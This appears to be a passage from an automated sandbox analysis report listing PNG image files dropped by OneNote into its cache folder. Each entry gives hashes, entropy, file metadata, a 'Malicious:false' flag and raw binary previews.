                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

